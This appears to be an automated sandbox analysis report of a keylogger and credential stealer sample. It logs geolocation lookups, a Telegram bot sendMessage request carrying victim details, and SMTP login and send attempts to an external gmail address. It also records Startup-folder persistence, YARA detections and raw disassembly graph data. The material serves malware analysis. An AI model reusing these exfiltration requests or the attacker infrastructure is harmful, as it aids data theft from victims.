                                                                                                                2025-01-10 18:11:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.649896104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:11:10 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:10 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847459
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AtSka7zJoNfHzhRsB3yK34Zy0G%2BAfRhnShba%2BGlXE6AFznKpYWTebN7JYi3SK2PdMGGi9fgGhSVUadLePvMJOPRwy3f8RgS35KEgbmjiGBL0YK0CYRUdhAsZaSeorC3eFpnQOp%2Bm"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0c64b170fa8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1520&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1748502&cwnd=252&unsent_bytes=0&cid=07d5d4678f09d316&ts=155&x=0"
                                                                                                                2025-01-10 18:11:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.649907104.21.16.14432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:11 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:11 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847460
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4sitQm30GsLH1u2BTW0N9tepNlRBl1%2BnW9qJ%2F4orTPe%2BSjMk63Wjc9wtc3uI20i7xOmrhMP0tIQ6eUOGngiVIj3hN6%2BKA5mDAbTAhDLUNfnD6O9kz1wKNCz7TVeZkyY9euGXoQx"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0ce49058ce3-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1816&rtt_var=710&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1510605&cwnd=252&unsent_bytes=0&cid=cb34b34834dbfd93&ts=169&x=0"
                                                                                                                2025-01-10 18:11:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.649913149.154.167.2204432136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:11:12 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:11:12 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 18:11:12 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 18:11:12 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                SMTP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                Jan 10, 2025 19:11:07.367440939 CET587498713.130.71.34192.168.2.6220 acadental.com ESMTP Postfix (Ubuntu)
                                                                                                                Jan 10, 2025 19:11:07.367710114 CET49871587192.168.2.63.130.71.34EHLO 210979
                                                                                                                Jan 10, 2025 19:11:07.484662056 CET587498713.130.71.34192.168.2.6250-acadental.com
                                                                                                                250-PIPELINING
                                                                                                                250-SIZE 30971520
                                                                                                                250-ETRN
                                                                                                                250-STARTTLS
                                                                                                                250-AUTH PLAIN LOGIN
                                                                                                                250-ENHANCEDSTATUSCODES
                                                                                                                250-8BITMIME
                                                                                                                250-DSN
                                                                                                                250 SMTPUTF8
                                                                                                                Jan 10, 2025 19:11:07.488297939 CET49871587192.168.2.63.130.71.34AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
                                                                                                                Jan 10, 2025 19:11:07.605179071 CET587498713.130.71.34192.168.2.6334 UGFzc3dvcmQ6
                                                                                                                Jan 10, 2025 19:11:11.120903969 CET587498713.130.71.34192.168.2.6535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                Jan 10, 2025 19:11:11.121153116 CET49871587192.168.2.63.130.71.34MAIL FROM:<shipping@acadental.com>
                                                                                                                Jan 10, 2025 19:11:11.239209890 CET587498713.130.71.34192.168.2.6250 2.1.0 Ok
                                                                                                                Jan 10, 2025 19:11:11.239459991 CET49871587192.168.2.63.130.71.34RCPT TO:<enquiry.zamehinc@gmail.com>
                                                                                                                Jan 10, 2025 19:11:11.357387066 CET587498713.130.71.34192.168.2.6501 5.5.2 <210979>: Helo command rejected: Invalid name
                                                                                                                Jan 10, 2025 19:11:18.559165001 CET587499473.130.71.34192.168.2.6220 acadental.com ESMTP Postfix (Ubuntu)
                                                                                                                Jan 10, 2025 19:11:18.559390068 CET49947587192.168.2.63.130.71.34EHLO 210979
                                                                                                                Jan 10, 2025 19:11:18.680435896 CET587499473.130.71.34192.168.2.6250-acadental.com
                                                                                                                250-PIPELINING
                                                                                                                250-SIZE 30971520
                                                                                                                250-ETRN
                                                                                                                250-STARTTLS
                                                                                                                250-AUTH PLAIN LOGIN
                                                                                                                250-ENHANCEDSTATUSCODES
                                                                                                                250-8BITMIME
                                                                                                                250-DSN
                                                                                                                250 SMTPUTF8
                                                                                                                Jan 10, 2025 19:11:18.680958033 CET49947587192.168.2.63.130.71.34AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
                                                                                                                Jan 10, 2025 19:11:22.805089951 CET587499473.130.71.34192.168.2.6334 UGFzc3dvcmQ6
                                                                                                                Jan 10, 2025 19:11:26.548578978 CET587499473.130.71.34192.168.2.6535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                Jan 10, 2025 19:11:26.548854113 CET49947587192.168.2.63.130.71.34MAIL FROM:<shipping@acadental.com>
                                                                                                                Jan 10, 2025 19:11:26.669436932 CET587499473.130.71.34192.168.2.6250 2.1.0 Ok
                                                                                                                Jan 10, 2025 19:11:26.669635057 CET49947587192.168.2.63.130.71.34RCPT TO:<enquiry.zamehinc@gmail.com>
                                                                                                                Jan 10, 2025 19:11:26.792495012 CET587499473.130.71.34192.168.2.6501 5.5.2 <210979>: Helo command rejected: Invalid name

                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:13:10:37
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\Desktop\RubzLi27lr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\RubzLi27lr.exe"
                                                                                                                Imagebase:0xab0000
                                                                                                                File size:1'094'656 bytes
                                                                                                                MD5 hash:44F0EA32A5ACF017ACF1D2A595C615F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:13:10:39
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\RubzLi27lr.exe"
                                                                                                                Imagebase:0x8e0000
                                                                                                                File size:1'094'656 bytes
                                                                                                                MD5 hash:44F0EA32A5ACF017ACF1D2A595C615F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 68%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:13:10:42
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\RubzLi27lr.exe"
                                                                                                                Imagebase:0x7b0000
                                                                                                                File size:45'984 bytes
                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3368516346.0000000000423000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:13:10:55
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                                                                                                                Imagebase:0x7ff794460000
                                                                                                                File size:170'496 bytes
                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:13:10:55
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
                                                                                                                Imagebase:0x8e0000
                                                                                                                File size:1'094'656 bytes
                                                                                                                MD5 hash:44F0EA32A5ACF017ACF1D2A595C615F1
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:13:10:58
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
                                                                                                                Imagebase:0xc10000
                                                                                                                File size:45'984 bytes
                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.7%
                                                                                                                  Dynamic/Decrypted Code Coverage:0.9%
                                                                                                                  Signature Coverage:2.8%
                                                                                                                  Total number of Nodes:1962
                                                                                                                  Total number of Limit Nodes:66
                                                                                                                  execution_graph 95833 b03f75 95844 acceb1 95833->95844 95835 b03f8b 95843 b04006 95835->95843 95911 ace300 23 API calls 95835->95911 95838 b04052 95841 b04a88 95838->95841 95913 b2359c 82 API calls __wsopen_s 95838->95913 95840 b03fe6 95840->95838 95912 b21abf 22 API calls 95840->95912 95853 abbf40 95843->95853 95845 accebf 95844->95845 95846 acced2 95844->95846 95914 abaceb 23 API calls ISource 95845->95914 95847 accf05 95846->95847 95848 acced7 95846->95848 95925 abaceb 23 API calls ISource 95847->95925 95915 acfddb 95848->95915 95852 accec9 95852->95835 95938 abadf0 95853->95938 95855 abbf9d 95856 abbfa9 95855->95856 95857 b004b6 95855->95857 95859 abc01e 95856->95859 95860 b004c6 95856->95860 95967 b2359c 82 API calls __wsopen_s 95857->95967 95943 abac91 95859->95943 95968 b2359c 82 API calls __wsopen_s 95860->95968 95863 b004f5 95864 b0055a 95863->95864 95969 acd217 235 API calls 95863->95969 95894 abc603 95864->95894 95970 b2359c 82 API calls __wsopen_s 95864->95970 95867 abc7da 95956 acfe0b 95867->95956 95873 abec40 235 API calls 95908 abc039 ISource __fread_nolock 95873->95908 95874 acfe0b 22 API calls 95907 abc350 ISource __fread_nolock 95874->95907 95875 abaf8a 22 API calls 95875->95908 95876 b17120 22 API calls 95876->95908 95877 abc808 __fread_nolock 95877->95874 95878 b0091a 96004 b23209 23 API calls 95878->96004 95881 b008a5 95978 abec40 95881->95978 95884 b008cf 95884->95894 96002 aba81b 41 API calls 95884->96002 95885 b00591 95971 b2359c 82 API calls __wsopen_s 95885->95971 95886 b008f6 96003 b2359c 82 API calls __wsopen_s 95886->96003 95892 abc237 95893 abc253 95892->95893 96005 aba8c7 95892->96005 95896 b00976 95893->95896 95901 abc297 ISource 95893->95901 95894->95838 96009 abaceb 23 API calls ISource 95896->96009 95898 acfddb 22 API calls 95898->95908 95903 b009bf 95901->95903 95954 abaceb 23 API calls ISource 95901->95954 95902 abc335 95902->95903 95904 abc342 95902->95904 95903->95894 96010 b2359c 82 API calls __wsopen_s 95903->96010 95955 aba704 22 API calls ISource 95904->95955 95905 abbbe0 40 API calls 95905->95908 95910 abc3ac 95907->95910 95966 acce17 22 API calls ISource 95907->95966 95908->95863 95908->95864 95908->95867 95908->95873 95908->95875 95908->95876 95908->95877 95908->95878 95908->95881 95908->95885 95908->95886 95908->95892 95908->95894 95908->95898 95908->95903 95908->95905 95909 acfe0b 22 API calls 95908->95909 95947 abad81 95908->95947 95972 b17099 22 API calls __fread_nolock 95908->95972 95973 b35745 54 API calls _wcslen 95908->95973 95974 acaa42 22 API calls ISource 95908->95974 95975 b1f05c 40 API calls 95908->95975 95976 aba993 41 API calls 95908->95976 95977 abaceb 23 API calls ISource 95908->95977 95909->95908 95910->95838 95911->95840 95912->95843 95913->95841 95914->95852 95918 acfde0 95915->95918 95917 acfdfa 95917->95852 95918->95917 95921 acfdfc 95918->95921 95926 adea0c 95918->95926 95933 ad4ead 7 API calls 2 library calls 95918->95933 95920 ad066d 95935 ad32a4 RaiseException 95920->95935 95921->95920 95934 ad32a4 RaiseException 95921->95934 95924 ad068a 95924->95852 95925->95852 95931 ae3820 __dosmaperr 95926->95931 95927 ae385e 95937 adf2d9 20 API calls __dosmaperr 95927->95937 95929 ae3849 RtlAllocateHeap 95930 ae385c 95929->95930 95929->95931 95930->95918 95931->95927 95931->95929 95936 ad4ead 7 API calls 2 library calls 95931->95936 95933->95918 95934->95920 95935->95924 95936->95931 95937->95930 95939 abae01 95938->95939 95942 abae1c ISource 95938->95942 96011 abaec9 95939->96011 95941 abae09 CharUpperBuffW 95941->95942 95942->95855 95945 abacae 95943->95945 95944 abacd1 95944->95908 95945->95944 96017 b2359c 82 API calls __wsopen_s 95945->96017 95948 affadb 95947->95948 95949 abad92 95947->95949 95950 acfddb 22 API calls 95949->95950 95951 abad99 95950->95951 96018 abadcd 95951->96018 95954->95902 95955->95907 95959 acfddb 95956->95959 95957 adea0c ___std_exception_copy 21 API calls 95957->95959 95958 acfdfa 95958->95877 95959->95957 95959->95958 95962 acfdfc 95959->95962 96030 ad4ead 7 API calls 2 library calls 95959->96030 95961 ad066d 96032 ad32a4 RaiseException 95961->96032 95962->95961 96031 ad32a4 RaiseException 95962->96031 95965 ad068a 95965->95877 95966->95907 95967->95860 95968->95894 95969->95864 95970->95894 95971->95894 95972->95908 95973->95908 95974->95908 95975->95908 95976->95908 95977->95908 95995 abec76 ISource 95978->95995 95979 acfddb 22 API calls 95979->95995 95980 abfef7 95987 aba8c7 22 API calls 95980->95987 95994 abed9d ISource 95980->95994 95983 b04600 95989 aba8c7 22 API calls 95983->95989 95983->95994 95984 b04b0b 96036 b2359c 82 API calls __wsopen_s 95984->96036 95985 aba8c7 22 API calls 95985->95995 95987->95994 95989->95994 95991 ad0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95991->95995 95992 abfbe3 95992->95994 95996 b04bdc 95992->95996 96001 abf3ae ISource 95992->96001 95993 aba961 22 API calls 95993->95995 95994->95884 95995->95979 95995->95980 95995->95983 95995->95984 95995->95985 95995->95991 95995->95992 95995->95993 95995->95994 95998 ad00a3 29 API calls pre_c_initialization 95995->95998 95999 b04beb 95995->95999 96000 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95995->96000 95995->96001 96033 ac01e0 235 API calls 2 library calls 95995->96033 96034 ac06a0 41 API calls ISource 95995->96034 96037 b2359c 82 API calls __wsopen_s 95996->96037 95998->95995 96038 b2359c 82 API calls __wsopen_s 95999->96038 96000->95995 96001->95994 96035 b2359c 82 API calls __wsopen_s 96001->96035 96002->95886 96003->95894 96004->95892 96006 aba8ea __fread_nolock 96005->96006 96007 aba8db 96005->96007 96006->95893 96007->96006 96008 acfe0b 22 API calls 96007->96008 96008->96006 96009->95903 96010->95894 96012 abaed9 __fread_nolock 96011->96012 96013 abaedc 96011->96013 96012->95941 96014 acfddb 22 API calls 96013->96014 96015 abaee7 96014->96015 96016 acfe0b 22 API calls 96015->96016 96016->96012 96017->95944 96024 abaddd 96018->96024 96019 abadb6 96019->95908 96020 acfddb 22 API calls 96020->96024 96022 aba8c7 22 API calls 96022->96024 96023 abadcd 22 API calls 96023->96024 96024->96019 96024->96020 96024->96022 96024->96023 96025 aba961 96024->96025 96026 acfe0b 22 API calls 96025->96026 96027 aba976 96026->96027 96028 acfddb 22 API calls 96027->96028 96029 aba984 96028->96029 96029->96024 96030->95959 96031->95961 96032->95965 96033->95995 96034->95995 96035->95994 96036->95994 96037->95999 96038->95994 96039 ab1cad SystemParametersInfoW 96040 ab2de3 96041 ab2df0 __wsopen_s 96040->96041 96042 ab2e09 96041->96042 96043 af2c2b ___scrt_fastfail 96041->96043 96056 ab3aa2 96042->96056 96045 af2c47 GetOpenFileNameW 96043->96045 96048 af2c96 96045->96048 96113 ab6b57 96048->96113 96052 af2cab 96052->96052 96053 ab2e27 96084 ab44a8 96053->96084 96125 af1f50 96056->96125 96059 ab3ae9 96131 aba6c3 96059->96131 96060 ab3ace 96062 ab6b57 22 API calls 96060->96062 96063 ab3ada 96062->96063 96127 ab37a0 96063->96127 96066 ab2da5 96067 af1f50 __wsopen_s 96066->96067 96068 ab2db2 GetLongPathNameW 96067->96068 96069 ab6b57 22 API calls 96068->96069 96070 ab2dda 96069->96070 96071 ab3598 96070->96071 96072 aba961 22 API calls 96071->96072 96073 ab35aa 96072->96073 96074 ab3aa2 23 API calls 96073->96074 96075 ab35b5 96074->96075 96076 af32eb 96075->96076 96077 ab35c0 96075->96077 96082 af330d 96076->96082 96153 acce60 41 API calls 96076->96153 96141 ab515f 96077->96141 96083 ab35df 96083->96053 96154 ab4ecb 96084->96154 96087 af3833 96176 b22cf9 96087->96176 96089 ab4ecb 94 API calls 